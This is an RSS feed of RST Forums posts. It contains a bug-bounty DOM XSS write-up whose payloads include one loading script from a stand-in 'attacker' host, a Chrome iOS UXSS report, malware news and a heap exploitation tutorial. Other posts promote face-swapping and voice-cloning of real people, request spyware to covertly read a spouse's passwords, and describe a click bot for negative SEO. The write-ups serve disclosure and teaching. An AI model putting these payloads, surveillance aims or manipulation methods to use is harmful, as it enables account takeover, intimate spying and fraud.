		Printre modelele "vedeta" se numara: Wan 2.1 (necenzurat), Wan 2.2 (necenzurat), Hunyuan 1.5 (necenzurat), Flux 1 (cenzurat), Flux 2 (cenzurat), Qwen Image (necenzurat), si noul model Z-Image (necenzurat), care genereaza poze extrem de credibile in doar cateva secunde.
	
	
		Majoritatea acestor modele de baza vin la pachet cu alte modele care permit crearea si editarea clipurilor si pozelor in toate felurile posibile.
	
	
		Pentru lip sync se pot folosi modelele Wan 2.1&gt;Infinitetalk 14B sau Wan 2.1&gt;Multitalk 14B. Infinitetalk are un lip sync bun, insa are o problema cu degetele (in cazul in care 
	
	
		Multe dintre modelele gasite in Wan2GP permit sa clonati infatisarea altor persoane. Stiu sa pastreze caracteristicile fizice (chip, tatuaje, cercei), dar si hainele din imaginile pe care le folositi in generarea clipurilor. Cred ca stiti cine le abuzeaza foarte mult in ultimii ani.
	
	
		Tot in pachetul Wan2GP gasiti modele care va permit sa schimbati cu totul infatisarea unor personaje din clipuri video deja existente. Mai exact, puteti lua un clip cu Ion Iliescu in timp ce face anumite actiuni, sa il bagati intr-un model de pe Wan2GP si sa il inlocuiti cu Nicolae Ceausescu facand aceleasi miscari, in acelasi mediu. Nu necesita prea multa munca, doar sa lasati calculatorul sa proceseze pana isi termina taskul. 
		 
		Tot ce am postat mai mult foloseste interfata Gradio care este mult mai intuitiva decat flowurile din ComfyUI. 
		Aveti nevoie de o placa video capabila "sa duca" aceste modele, de la producatorul nVidia. Dupa cum spuneam, Wan2GP functioneaza si pe placi video cu 6 Gb vram. Cu cat aveti mai mult vram cu atat isi termina mai repede joburile. O placa video cu doar 6 Gb vram poate sa proceseze cateva ore un video, pe cand o placa video cu 32 Gb vram termina acelasi job in cateva minute. 
		Cu cat mai multa memorie RAM cu atat mai bine. Toate modelele de mai sus au nevoie de RAM. Wan2GP are profile diferite care va permit sa il folositi si cu mult mai putin de 128 Gb RAM (viteza de procesare va fi afectata). 
		Am postat la pachet RVC / Applio si Wan2GP pentru ca puteti sa combinati vocile clonate cu Applio cu videourile generate de modelele din Wan2GP. Sunt foarte utile in scopuri "bune" si devastatoare cand sunt folosite in scopuri "malefice". 
		 
		 
	
	
		Pentru a instala cat mai usor modelele (poate fi o uriasa bataie de cap sa le instalati), recomand sa folositi Applio (parte a aplicatiei Dione), iar in cazul Wan2GP sa folositi One-click installation - Redtash1 sau Pinokio Computer sau chiar Dione.
	



	 
 


	In cazul in care intampinati probleme atunci cand doriti sa folositi unul dintre aceste modele puteti lasa un mesaj in comentarii si va ajut daca stiu rezolvarea.]]></description><pubDate>Sun, 07 Dec 2025 21:04:08 +0000</pubDate></item><item><title>SVG Filters - Clickjacking 2.0</title><link><![CDATA[https://rstforums.com/forum/topic/123985-svg-filters-clickjacking-20/?do=findComment&comment=701441]]></link><description>O metoda noua si interesanta de clickjacking. Nu voi da copy/paste la articol pentru ca e muncit si e pacat sa ii fac duplicate content. Il gasiti in forma integrala aici https://lyra.horse/blog/2025/12/svg-clickjacking/
 


	 
 


	Alte articole de pe blogul ei: https://lyra.horse/blog/</description><pubDate>Sun, 07 Dec 2025 20:08:17 +0000</pubDate></item><item><title>[VIDEO] Hacking '&#x1F602;' to Track ANY WhatsApp or Signal User</title><link><![CDATA[https://rstforums.com/forum/topic/123984-video-hacking-%F0%9F%98%82-to-track-any-whatsapp-or-signal-user/?do=findComment&comment=701438]]></link><description/><pubDate>Fri, 05 Dec 2025 10:11:05 +0000</pubDate></item><item><title>De vizionat la plictiseala</title><link><![CDATA[https://rstforums.com/forum/topic/123983-de-vizionat-la-plictiseala/?do=findComment&comment=701433]]></link><description>Uite asa cum stateam cu berea in brate am dat din intamplare peste ceva frumos de vizionat daca cineva se plictiseste.
 


	 
 


	(24) The Man Who Made Everything on the Internet Free - YouTube
 


	The Man Who Tried to Unmask Anonymous
 


	 
 


	ps: nu e al meu canalul, nu am nici o afiliere, nu reclama, pur si simplu beer &#x1F37A;, alune si amintiri &#x1F919;
 


	Daca mai stiti ceva interesant de vizionat lasa-ti un reply...
 


	hastag 2026 sa-mi bag pl, parca alaltaieri era vara lu '09 cand @Nytro imi dadea warn ca scriam dea-n pulea &#x1F602;</description><pubDate>Tue, 02 Dec 2025 22:15:11 +0000</pubDate></item><item><title>Cont ebaykleineanzaigen !</title><link><![CDATA[https://rstforums.com/forum/topic/123980-cont-ebaykleineanzaigen/?do=findComment&comment=701414]]></link><description>Salutare! 
 


	Am o problema cu ebaykleineanzaigen.de, am nevoie de mai multe conturi active, dar ma blocheaza mereu, pentru ca imi fac publicitare la o mica combinatie sa zic asa fara sa fiu ( firma )  si ma blocheaza! Tot mi-am facut conturi noi, de pe care puteam sa postez, din nou pe acest site, ba faceam de pe telefonul de firma, ba faceam de pe laptopul iubitei mele, pana cand si acolo au blocat tot, si chiar daca pot sa fac cont nou, nu mai pot sa postez. 
 


	Am incercat asa : schimbare IP cu VPN, fara rezultat , am reinstalat browser si am sters cookies, fara rezultat, mi-am dat Hotspot, de pe telefon pe laptop, si tot nu am reusit sa postez din nou, chiar daca cont nou mi-am putut face. Eu mai am un cont principal care il folosesc de pe telefon si imi merge perfect, acel cont nu vreau sa il risc, dar am nevoie de altele noi, in concluzie : Cum au reusit sa faca asta? Raman cookies-urile, undeva salvate si nu stiu eu ?!  Nu pare a fi un ban pe ip. 
 


	Astept solutii din partea voastra, cu mare recunostinta!</description><pubDate>Tue, 25 Nov 2025 18:48:00 +0000</pubDate></item><item><title>Do you think most people who enjoy black hat hacking also want to become white hat hackers?</title><link><![CDATA[https://rstforums.com/forum/topic/123974-do-you-think-most-people-who-enjoy-black-hat-hacking-also-want-to-become-white-hat-hackers/?do=findComment&comment=701377]]></link><description>Hi everyone! Sorry I only speak English (and some French) so I have been translating the posts on this forum as I am really interested in the discussions here. I just wanted to post my own question, I'm just curious how many people who enjoy black hat hacking actually hope to one day work in infosec or something where they can use their skills legitimately (I mean if they don't already, since I'm sure some people wear both hats). Any thoughts?</description><pubDate>Sat, 08 Nov 2025 18:30:59 +0000</pubDate></item><item><title>Aplica&#x21B;ie Spion</title><link><![CDATA[https://rstforums.com/forum/topic/123973-aplica%C8%9Bie-spion/?do=findComment&comment=701371]]></link><description>Salutare , nu m&#x103; pricep in ale software-ului si din aceasta cauz&#x103; apelez la ajutorul celor pricepu&#x21B;i. Sunt interesat de o aplica&#x21B;ie/ program pe care sa o/s&#x103;-l instalez in telefonul &#x219;i laptopul so&#x21B;iei pentru a afla tot ce acceseaz&#x103; ea ( site-uri, aplicatii &#x219;i parole ) fara c&#x103; ea s&#x103;-&#x219;i de-a seama, .v-as fi foarte recunosc&#x103;tor dac&#x103; m-a&#x21B;i ajuta . Mul&#x21B;umesc anticipat la toat&#x103; lumea</description><pubDate>Thu, 06 Nov 2025 18:57:34 +0000</pubDate></item><item><title>New here</title><link><![CDATA[https://rstforums.com/forum/topic/123972-new-here/?do=findComment&comment=701368]]></link><description>Hey folks, just checking out the community. I&#x2019;m interested in how people think and work in this space &#x2014; hoping to pick up some insights and contribute where I can!</description><pubDate>Thu, 06 Nov 2025 01:52:14 +0000</pubDate></item><item><title>Google SERP Clicker - cine a mai testat asa ceva?</title><link><![CDATA[https://rstforums.com/forum/topic/123969-google-serp-clicker-cine-a-mai-testat-asa-ceva/?do=findComment&comment=701357]]></link><description>De cateva zile testez o metoda de a manipula rezultatele din SERP cu un clicker care acceseaza rezultatele din Google. Rezultatele sunt... ciudatele rau. Poate se gaseste cineva pe aici care a mai testat asa ceva si vrea sa isi impartaseasca experienta. 
	 
	Metoda: 
	 
	- am creeat un robot care acceseaza pagina Google, tasteaza query, da enter, misca mouse pe ecran (coordonate x,y random), da scroll, da click pe cateva rezultate (coordonate x,y random pe titlul paginii), apoi, la final, da click pe rezultatul siteului target. Tot ce inseamna miscare a mouse-ului, clicks, mouse scroll, este random pe coordonate x, y. Nu am facut inca mouse-ul sa aiba si traiectorie de tip "arc" ci doar in linii drepte. Robotul este 100% facut de mine, nu un program abuzat de sute de persoane inainte. 
	- folosesc proxy-uri rezidentiale de Romania (sunt mai putin tavalite decat cele din US, UK etc). Urmeaza sa testez cu ip-uri de mobil orange/vodafone/telekom.
 


	- verificarea rezultatelor am facut-o atat de pe telefoane cat si de pe mai multe browsere cu sau fara istoric, cu sau fara cont logat, cu sau fara proxy-uri.
 


	 
 


	Primele teste au avut scopul sa daram rezultatul folosit la teste de pe pozitiile pe care se afla initial. Urmeaza sa fac teste si pe cresterea unei pagini in SERP dupa ce pun la punct strategia. 
	 
	Rezultatele obtinute au fost urmatoarele: 
	 
 


	Ziua 1: pagina de test era pe pozitia 8 pe toate browserele cu care am facut verificarea initiala. Pagina de test apartine unui site foarte cunoscut, foarte vechi, cu foarte mult trafic si cu ranking foarte bun in general. Query-ul meu continea si un keyword random (sa zicem MG8320) care automat scadea volumul de cautari pe acel query la 0, ca sa nu fie afectat experimentul de o pozitie bine consolidata anterior. Dupa cateva ore pagina de test a ajuns pe pozitia 6, apoi 4. Timp de 10 ore a ramas undeva pe pozitiile 4-6, in functie de device-ul folosit, de browserele folosite si de ip-ul folosit. La fix 12 ore dupa ce am dat drumul la robot pagina a zburat pe pozitia 25 si acolo a ramas de o saptamana. Rezultat: multumitor - poate fi folosit la negative SEO. 
	 
	Ziua 2: o alta pagina de test era pe pozitia 6 pe un query cu cautari multe si cu o pozitie consolidata de ani de zile. Dupa 12 ore de rulat robotelul, pozitia nu s-a schimbat deloc. Rezultat: fail total. 
	 
	Ziua 3: o alta pagina de test era pe pozitiile 5-9 pe un query cu numar mediu de cautari. Dupa cateva ore au inceput sa apara fluctuatii mari in functie de browserul si dispozitivul folosit pentru verificari. A jonglat intre pozitia 2 si pozitia 11. Dupa 12 ore a ramas infipt pe pozitiile 6 - 9 in functie de browser, device si ip folosite pentru verificari. Rezultat: mixed. Nu pot spune ca a fost un succes, dar nu a fost nici fail, pentru ca ce am facut eu a avut impact pe termen scurt. Diferenta de la pozitia 5 la pozitia 6 nu poate fi luata in seama pentru ca fluctuatiile de acest fel sunt normale la Google. 
	 
	Ziua 4: o alta pagina de test era pe pozitia 2. Dupa 12 ore de rulat clickerul a ramas tot pe 2. Rezultat: fail. 
	 
	Am in minte posibilele cauze care duc la fail sau succes, printre ele numarandu-se calitatea proxyurilor, cat de bine consolidata a fost pozitia paginii pe acel query, detectarea browserelor mele anonime, sau pur si simplu algoritmi Google despre care nu stiu. Traiectoria cursorului nu cred ca are impact asa cum o are la serviciul recaptcha si poate fi scoasa din ecuatie. 
	 
	Asa ca intrebarea mea este urmatoarea: a mai facut careva dintre voi astfel de teste pe Google si a putut sa reproduca anumite rezultate, fie ca s-a dus rezultatul folosit pentru teste in jos, fie ca a crescut pe pozitii mai bune?</description><pubDate>Mon, 27 Oct 2025 22:36:57 +0000</pubDate></item><item><title>&#x218;ters</title><link><![CDATA[https://rstforums.com/forum/topic/123965-%C8%99ters/?do=findComment&comment=701347]]></link><description>&#x218;ters</description><pubDate>Tue, 21 Oct 2025 23:44:09 +0000</pubDate></item><item><title>Posibilitate de decriptare date la un USB Disk Buffalo criptat cu Secure Manager Lock easy</title><link><![CDATA[https://rstforums.com/forum/topic/123961-posibilitate-de-decriptare-date-la-un-usb-disk-buffalo-criptat-cu-secure-manager-lock-easy/?do=findComment&comment=701342]]></link><description>Salutare la toata lumea,
 


	 
 


	cu speranta ca are cineva o idee, incerc sa access un disk USB, nefolosit de peste 15 ani, de la Buffalo criptat cu Secure Manager Lock easy. Parolade decriptare date nu a fost notata din pacate nicaieri.
 


	Daca are cineva o idee ce as putea sa incerc, este binevenita.
 


	Va multumesc</description><pubDate>Tue, 21 Oct 2025 07:59:55 +0000</pubDate></item><item><title>Long time no see</title><link><![CDATA[https://rstforums.com/forum/topic/123958-long-time-no-see/?do=findComment&comment=701330]]></link><description>Salutari si bine v-am regasit
 


	Mi-am aminte recent de forum, ma bucura faptul ca este inca in picioare dupa atata timp. Ultima data aveam la profil "bautor de palinca" :)). O zi faina sa aveti!.</description><pubDate>Tue, 14 Oct 2025 13:06:54 +0000</pubDate></item><item><title>Parola telefon android</title><link><![CDATA[https://rstforums.com/forum/topic/123957-parola-telefon-android/?do=findComment&comment=701329]]></link><description>Salut, recent un unchi de-ai mei a degedat, odata cu el s-a dus si parola telefonului. Sotia lui are nevoie sa acceseze anumite documente destul de importante din telefon. Exista vreo optiune de a trece pe langa acea parola fara a-i da resetare totala? Multumesc!</description><pubDate>Tue, 14 Oct 2025 12:55:31 +0000</pubDate></item><item><title>Pachete SEO de advertoriale pentru campanii complete</title><link><![CDATA[https://rstforums.com/forum/topic/123953-pachete-seo-de-advertoriale-pentru-campanii-complete/?do=findComment&comment=701318]]></link><description>Salut,
 


	 
 


	Ofer pachete SEO de advertoriale pentru campanii complete. 
	&#x2714; Publicare rapid&#x103; 
	&#x2714; Distribuire pe pagini de Facebook 
	&#x2714; Linkuri interne la fiecare articol + linkuri externe &#xEE;n pachetele dedicate 
	&#x2714; Raport de publicare trimis dup&#x103; fiecare comand&#x103; 
	&#x2714; Colaborare transparent&#x103;, cu factur&#x103; inclus&#x103; pentru fiecare comand&#x103;
 


	 
 


	Pentru detalii, &#xEE;mi po&#x21B;i scrie &#xEE;n privat.</description><pubDate>Sat, 04 Oct 2025 10:47:19 +0000</pubDate></item><item><title>DOM XSS: Bypassing Server-side Cookie Overwrite, Chrome innerHTML Quirk, and JSON Injection</title><link><![CDATA[https://rstforums.com/forum/topic/123950-dom-xss-bypassing-server-side-cookie-overwrite-chrome-innerhtml-quirk-and-json-injection/?do=findComment&comment=701313]]></link><description><![CDATA[DOM XSS: Bypassing Server-side Cookie Overwrite, Chrome innerHTML Quirk, and JSON Injection
							
						
					
				
			
		
	



	
		
			Hi everyone in this post I walk through three DOM-XSS findings I discovered while hunting on a bug-bounty program: a cookie-scoped bypass of server cookie overwrites, a Chrome innerHTML quirk, and a JSON injection that can overwrite window.
		 

		
			Cookie-based DOM XSS: bypassing server-side cookie overwrite
		

		
			I was checking a React application in a bug-bounty program for DOM XSS vulnerabilities, and I looked not only code that parses query strings from the URL but also any code that parse document.cookie to extract values. On the login page I found a function (call it i()) that runs a regex against document.cookie to extract the lang cookie and returns that value; if the regex doesn’t match it falls back to returning “en”. The value returned by that function is then inserted unsanitized into a script element’s innerHTML as value for the language property inside a page object.
		 

		function i() {
  const t = document.cookie.match(new RegExp("(^| )lang=([^;]+)"));
  const i = t ? t[2] : "en";
  return {
    lang: i,
  };
}

		, l = document.createElement("script");
                        l.innerHTML = `\n        var page = {\n          config: {\n            lang: "${p || i.lang}",....   }\n        }`,
                        document.head.appendChild(l);

		
			 
			That means an low-impact XSS on a subdomain could be used to set a malicious lang cookie and, if that cookie is shared across subdomains, it would result in DOM XSS on the login page. There was a catch: the login page itself issues a Set-Cookie for lang on every visit, which would overwrite any malicious lang value you had set. I think they were aware of the XSS risk here that’s likely why the server updates the lang cookie on each request.
		 

		document.cookie=`lang=vv",x:import(..),x:"; domain=.target.com; path=/login`

		
			 
			While looking for ways to bypass that protection, I discovered the same code runs on the signup page but unlike the login endpoint, the signup endpoint does not return a Set-Cookie for lang. That means an attacker can set a malicious lang cookie, set it to the entire domain (shared across subdomains) and set its Path=/signup; then redirecting a user to /signup will trigger the DOM XSS there. I used this XSS to steal users’ OAuth tokens and achieved an account takeover.
		 

		document.cookie=`lang=vv",x:import(..),x:"; domain=.target.com; path=/signup`
location="https://www.target.com/signup"

		
			DOM XSS due to Chrome InnerHTML Quirk
		

		
			There was an application that registered a postMessage listener but didn’t validate the sender origin. The listener looked for a specific property in incoming messages (call it x-params) and expected it to be JSON. Sometimes x-params arrived as a string, in those cases the code checked whether the string contained HTML-encoded quotes (e.g. &amp;quot;). If it did not, the string was passed straight to JSON.parse. If it did contain HTML-encoded quotes, the code created a &lt;p&gt; element, set that string as the element’s innerHTML (but did not append the &lt;p&gt; to the document), then read the element’s innerText and passed that to JSON.parse. This was used as a way to decode HTML-encoded JSON; because the &lt;p&gt; was never inserted into the page which will not produce an XSS.
		 

		
			
		

		
			However, this wasn’t a safe approach. Chrome has a quirk (previosuly mentioned by @terjanq in this tweet and discussed by @sudhanshur705 in this write-up) where assigning an &lt;img&gt; tag string to an element’s innerHTML can cause the browser to execute that tag even if the element is never appended to the DOM. That means an attacker can achieve XSS on the page with that vulnerable message listener by sending this following postMessage to it :
		 

		vulnpage.postMessage(
  JSON.stringify({
    body: {
      "x-params":
        "&amp;quot;&lt;img src="x"&gt;"
    }
  }),
  "*"
);

		
			DOM XSS using JSON Injection
		

		
			In this case the app was fetching an the front-end configuration from an endpoint that was responding with a JSON and it was appending the page’s querystring to that fetch call. The server reflected the querystring back into a JSON field decoded (not escaped/encoded), so by sending a query containing ” / } / ] you can break out of that field, change the JSON structure, and inject arbitrary keys and values.
		 

		
			After the config is fetched and parsed, the app passes the JSON to a function that extracts the window field and merges its contents into the global window object. Because we can inject a window key with a location property set to a javascript: payload, for example:
		 

		
			
				" ] }, "window": { "location": "javascript:import('https://attacker/eval.js')" }...
			 
		

		
			When the app merges that JSON into the global window object an XSS occurs, since assigning a value to window.location triggers navigation to that value, and navigating to a javascript: URI causes the browser to execute the attacker’s code in the page.
		 

		
			
		

		
			 
			 
			Exploit example (raw, not URL-encoded):
		 

		
			/login?v=
" ] }, "window": {
  "location": "javascript:malicious()",
  "REDACTED_2": {
    "REDACTED_3": { "REDACTED_4": "REDACTED_5" },
    "REDACTED_6": "REDACTED_7",
    "REDACTED_8": "REDACTED_9",
    "REDACTED_10": { "REDACTED_11": { "groups": [ "redx", "red" ] } },
    "REDACTED_14": "REDACTED_15",
    "REDACTED_16": { "groups": [ "REDACTED_17" ] }
  },
  "REDACTED_18": {
    "REDACTED_19": {
      "REDACTED_20": "REDACTED_21",
      "REDACTED_22": "REDACTED_23",
      "REDACTED_24": "REDACTED_25"
    }
  },
  "REDACTED_26": {
    "REDACTED_27": { "REDACTED_28": true, "REDACTED_29": true }
  }
} } , "f": { "fffff": { "v": [ "x"

		

		
			Thanks for reading and i hope you liked this post, you can catch me on X: @elmehdimee.
		 

		
			 
		 

		
			Sursa: https://elmahdi4.wordpress.com/2025/09/26/dom-xss-bypassing-server-side-cookie-overwrite-chrome-innerhtml-quirk-and-json-injection/]]></description><pubDate>Sun, 28 Sep 2025 08:15:33 +0000</pubDate></item><item><title>Chrome iOS UXSS Using iOS Shortcuts and Bookmarklets</title><link><![CDATA[https://rstforums.com/forum/topic/123949-chrome-ios-uxss-using-ios-shortcuts-and-bookmarklets/?do=findComment&comment=701312]]></link><description>Report description
					

					
						Chrome iOS UXSS Using iOS Shortcuts and Bookmarklets
					 

					
					
						Bug location
					

					
						Where do you want to report your vulnerability?
					

					
						Chrome VRP &#x2013; Report security issues affecting the Chrome browser. See program rules
					 

					
					
						The problem
					

					
						Please describe the technical details of the vulnerability
					

					
						In Chrome iOS using iOS Shortcuts we can add a new bookmark without any user interaction and confirmation, this bookmark can also be a javascript: URI to become a bookmarklet and get code execution on opened site. Using this behavior and couple other quirks we can silently add a bookmarklet, open a website then showing the bookmarks when tapping on it the bookmarklet will execute on the current opened website without the user knowing.
					 

					
						I don't know if there is some protection on this or it's some broken bugs that prevented us to do this straightforward but here is the pseudo code which we are able to perform the attack.
					 

					
						
							Open bookmarks
						
						
							Open blank page and close it immediately
						
						
							Add the bookmarklet
						
						
							Wait 2 seconds and open the user bookmarks
						
						
							Play Chrome dino game
						
						
							Open google.com
						
					

					
						In the final stage the user sees the bookmarks and in background google.com is opened when tapping on the bookmarklet the code will execute on google.com.
					 

					
						POC:
					 

					
						
							Add this Shortcut https://www.icloud.com/shortcuts/cf976fbc13294b00849d5564432b2d0a
						
						
							Run it
						
						
							Tap on where it says Tap Here
						
						
							XSS on google.com
						
					

					
						Video POC attached.
					 

					
						The underlying issue is ability to add a bookmark silently without user knowing or confirmation also no check on the bookmark url which allow an attacker to insert javascript: urls.
					 

					
						Impact analysis &#x2013; Please briefly explain who can exploit the vulnerability, and what they gain when doing so
					

					
						Using this vulnerability an attacker can trick a user to execute arbitrary code on targeted origin by running a shortcut and tapping on a bookmarklet displayed on the screen without knowing anything about it.
					 

					
					
						The cause
					

					
						What version of Chrome have you found the security issue in?
					

					
						Version 137.0.7151.107
					 

					
						Is the security issue related to a crash?
					

					
						No, it is not related to a crash.
					 

					
						Choose the type of vulnerability
					

					
						Site Isolation Bypass
					 

					
						How would you like to be publicly acknowledged for your report?
					

					
						@RenwaX23
					 
				
			
		

		
			
				
					 
				

				
					
						chrome_ios_shortcuts_uxss.mp4
					

					
						26 MB
					

					
						Download
					
				
			
		
	



	
		 
	

	
		Sursa: https://issues.chromium.org/issues/426631847
	

	
		Via: https://x.com/RenwaX23/status/1971925046047498432</description><pubDate>Sun, 28 Sep 2025 08:13:06 +0000</pubDate></item><item><title>09 - BruCON 0x11 - Deep-dive to Entra ID Token Theft Protection - Nestori Syynimaa</title><link><![CDATA[https://rstforums.com/forum/topic/123948-09-brucon-0x11-deep-dive-to-entra-id-token-theft-protection-nestori-syynimaa/?do=findComment&comment=701311]]></link><description>Token Theft attacks have risen during the past few years as organisations have moved to stronger authentication methods. Entra ID has built-in protections to mitigate these attacks. This session will cover how to use these protections and technical details of how they work under the hood. Although 99 % of identity attacks are still password-related, organisations are moving to using stronger authentication methods, making these attacks obsolete. In recent years, we have witnessed a rising number of Token Theft attacks. As tokens are issued after successful login, attackers can use them to impersonate users without a need to care about the authentication methods used. The two most often used Token Theft techniques are Adversary-in-the-Middle (AitM) attacks and malware on the endpoint. The former can be performed remotely (e.g., via phishing), whereas the latter requires access to the victim&#x2019;s endpoint (much harder). In this demo-packed session, I will cover various Entra ID built-in Token Theft protection techniques, such as Token Protection and Continuous Access Evaluation (CAE). These techniques are not silver bullets though, so I will share the technical details of how they work under the hood. I will show what they really protect against, but also how threat actors can leverage them in specific scenarios. After the session, you will know the technical details of Entra ID Token Theft protection features, how to use them, how threat actors may leverage them, and how to detect this.</description><pubDate>Sun, 28 Sep 2025 08:11:49 +0000</pubDate></item><item><title>Microsoft spots fresh XCSSET malware strain hiding in Apple dev projects</title><link><![CDATA[https://rstforums.com/forum/topic/123947-microsoft-spots-fresh-xcsset-malware-strain-hiding-in-apple-dev-projects/?do=findComment&comment=701310]]></link><description>Microsoft spots fresh XCSSET malware strain hiding in Apple dev projects
		
	

	
		
			Upgraded nasty slips into Xcode builds, steals crypto, and disables macOS defenses
		

		
			
				Carly Page
			

			
				Fri 26 Sep 2025 // 15:23 UTC
			
		
	



	
		
			
				 
			
		

		
			
				
					
						The long-running XCSSET malware strain has evolved again, with Microsoft warning of a new macOS variant that expands its bag of tricks while continuing to target developers.
					 

					
						Redmond's threat hunters said the latest version of XCSSET, which has been circulating since at least 2020, continues to spread by attaching itself to Xcode projects but now sports new capabilities to further complicate the lives of victims. Xcode is a suite of developer tools for building apps on Apple devices.
					 

					
						 
					 

					
						This isn't the first time it has re-emerged. Back in February, Microsoft warned that a resurgence of the malware had already been using compromised developer projects to deliver malicious payloads. Now the gang behind it appears to have gone further, building in stealthier persistence mechanisms, more obfuscation, and a a growing appetite for crypto theft.
					 

					
						 
					 

					
						The infection chain looks familiar &#x2013; four stages, culminating in the execution of various submodules &#x2013; but the final stage has been reworked. Among the more notable changes is a module that targets Firefox, stealing information with the help of a retooled build of the open source HackBrowserData tool. There's also a new clipboard hijacker designed to monitor copied text and replace cryptocurrency wallet addresses with those belonging to the attackers.
					 

					
						 
					

					
						Additionally, Microsoft reports that the malware installs a LaunchDaemon that executes a hidden payload called .root and even drops a bogus System Settings.app file in /tmp to conceal its activity.
					 

					
						The authors have also added more layers of obfuscation, including the use of run-only compiled AppleScripts, and the malware attempts to blunt Apple's defenses by disabling macOS automatic updates and Rapid Security Responses. Microsoft says these tweaks suggest the operators are intent on sticking around undetected for as long as possible while broadening their chances of monetization.
					 

					
						 
					 

					
						For developers, the threat vector remains the same: the malware slips into Xcode projects, so when a developer builds the code, they unwittingly execute the malicious payload. In February, researchers warned that compromised repositories and shared projects were already serving as distribution vehicles. This latest iteration makes embedding easier by using various strategies within project settings to evade detection.
					 

					
						Microsoft stressed that attacks seen so far have been limited, but given XCSSET's persistence over the years, the new modules are a reminder that Apple's developer ecosystem remains a ripe target. The company has shared its findings with Apple and collaborated with GitHub to remove repositories affected by XCSSET.
					 

					
						 
					 

					
						The company is also urging developers to scrutinize projects before running builds, keep macOS patched, and use endpoint security tools capable of detecting suspicious daemons and property list modifications. It's a warning Redmond knows the value of firsthand, having faced its own share of malware and state-backed intrusions in recent years.
					 

					
						XCSSET may not have the same name recognition as LockBit or other ransomware gangs, but it has proven surprisingly resilient. For anyone working in Xcode, the takeaway is clear: don't assume a project is safe &#x2013; the next build you run could be doing far more than you expect. &#xAE;
					 

					
						 
					 

					
						Sursa: https://www.theregister.com/2025/09/26/microsoft_xcsset_macos/</description><pubDate>Sun, 28 Sep 2025 08:10:12 +0000</pubDate></item><item><title>Windows Heap Exploitation - From Heap Overflow to Arbitrary R/W</title><link><![CDATA[https://rstforums.com/forum/topic/123946-windows-heap-exploitation-from-heap-overflow-to-arbitrary-rw/?do=findComment&comment=701309]]></link><description><![CDATA[Windows Heap Exploitation - From Heap Overflow to Arbitrary R/W
	

	
		Suraj Malhotra 
		
			2025-09-27 
		

		
			  Vulnerability Research 
		

		
			  Exploit, Heap, Windows
		
	



	
		
		
			
		 

		
			TLDR
		

		
			
				I was unable to find some good writeups/blogposts on Windows user mode heap exploitation which inspired me to write an introductory but practical post on Windows heap internals and exploitation. I cover the basics of Low Fragmentation Heap, Heap Overflow Attack, and File Struct Exploitation in Windows. Kudos to Angelboy for authoring the great challenge, “dadadb” which we’ll be using as a learning example.
			 
		

		
		
			A Primer on Windows Heap Internals
		

		
			The Windows Heap is divided into the following.
		 

		
			
		 

		
			
				
					NT Heap
				 

				
					
						Exists since early versions of Windows NT.
					
					
						The default heap implementation up through Windows 7/8.
					
				
			
			
				
					Segment Heap
				 

				
					
						Introduced in Windows 10 as the modern heap manager.
					
					
						Default for apps built with the Universal Windows Platform (UWP), Microsoft Edge, and newer apps.
					
				
			
		

		
			We’ll talk about the NT Heap here for our challenge. Further Nt Heap is divided into BackEnd and FrontEnd Allocators and have the following differences :
		 

		
			
				FrontEnd Allocator
				
					
						Handles small allocations (usually &lt; 16 KB)
					
					
						Uses the Low Fragmentation Heap (aka LFH, we’ll talk about this)
					
					
						Used for faster allocations/frees where performance is the priority.
					
				
			
			
				BackEnd Allocator
				
					
						Handles large allocations
					
					
						Core allocator responsible for demanding memory from OS.
					
				
			
		

		
			Low Fragmentation Heap (LFH)
		

		
			
		 

		
			Now we need to have a basic understanding of LFH for our usecase.
		 

		
			
				LFH was made for performance as it takes into account the common size allocations and allocates them efficiently.
			
			
				“Low Fragmentation“ also comes from the fact that there is no consolidation and coalescing of chunks if they are allocated or freed.
			
			
				It serves the allocations using a pool instead of requesting backend everytime. The chunks are located in the memory within a struct named UserBlock, which is simply a collection of pages which are broken into pieces of the same size.
			
			
				It only gets triggered if we allocate 18 subsequent allocations of a similar small size.
			
			
				The maximum chunk size LFH handles is ~16 KB (0x4000). Anything larger than that bypasses LFH and goes to the NT heap backend.
			
		

		
			Default Process Heap V/S Private Heap
		

		
			
		 

		
			The windows heap is also divided into how the heap is initialised for the process.
		 

		
			Default Process Heap
		

		
			Functions like malloc, new, and HeapAlloc(GetProcessHeap(), ...) usually allocate from this heap unless otherwise specified.
		 

		
			
				
					
						
							1
2
3
4
5
6
7

						
						
							typedef struct _PEB {
    ...
    PVOID ProcessHeap;               // Default heap (same as GetProcessHeap())
    ULONG NumberOfHeaps;
    PVOID* ProcessHeaps;             // Array of heap handles
    ...
} PEB, *PPEB;

						
					
				
			
		

		
			
				
					
						
							1
2
3

						
						
							HANDLE GetProcessHeap() {
    return NtCurrentTeb()-&gt;ProcessEnvironmentBlock-&gt;ProcessHeap;
}

						
					
				
			
		

		
			Private Heap
		

		
			Created explicitly by a process using:
		 

		
			
				
					
						
							1
2
3
4

						
						
							HANDLE customHeap = HeapCreate(0, 0, 0);
void* mem = HeapAlloc(customHeap, 0, 1024);
HeapFree(customHeap, 0, mem);
HeapDestroy(customHeap);

						
					
				
			
		

		
			I guess its time to hop onto our challenge now! 🤓
		 

		
		
			Inital Analysis
		

		
			This challenge was named “dadadb“ and is from Hitcon 2019 Quals. It should be run on Windows Server 2019 x64 as specified by the author. 
			Here is a sample run of the application for your reference.
		 

		
			
		 

		
			It looks like a database like program which allows us to add, update and remove a record. 
			The record structure looks like the following.
		 

		
			
				
					
						
							1
2
3
4
5
6

						
						
							struct record{
        char* data;
        size_t size;
        char key[0x41];
        struct record* next;
};

						
					
				
			
		

		
			There seems to be a login feature to manage different users as well. The program reads the user.txt within the same directory which includes the username and password combination as follows.
		 

		
			
				
					
						
							1
2
3
4

						
						
							#user.txt
orange:godlike
ddaa:phdphd
...

						
					
				
			
		

		
			So to summarise the functionalities of the program include :
		 

		
			
				Login (If Successful)
				
					
						Add Record
						
							
								Searches the database for the record by key, if not available add it. Also used to update a previous record data.
							
						
					
					
						Remove Record
						
							
								Removes an existing record by its key.
							
						
					
					
						View Record
						
							
								View the Data in a specific record.
							
						
					
					
						Exit
					
				
			
			
				Exit
			
		

		
		
			The Vulnerability
		

		
			So the vulnerability exists in the add/update function where it re-uses the previous size of the record to read the new data
		 

		
			
		 

		
			It could lead to a heap overflow attack if the same record is updated with the new size of data is less than its old size. Also it doesn’t assign the new updated size of the record to target-&gt;size, which is used while using the VIEW feature. We could abuse this to gain arbitrary read as well 
		 

		
			If you’ll notice carefully our program creates a private heap where it stores all the records.
		 

		
			
		 

		
			We’ll need to use LFH to exploit it for the following reasons :
		 

		
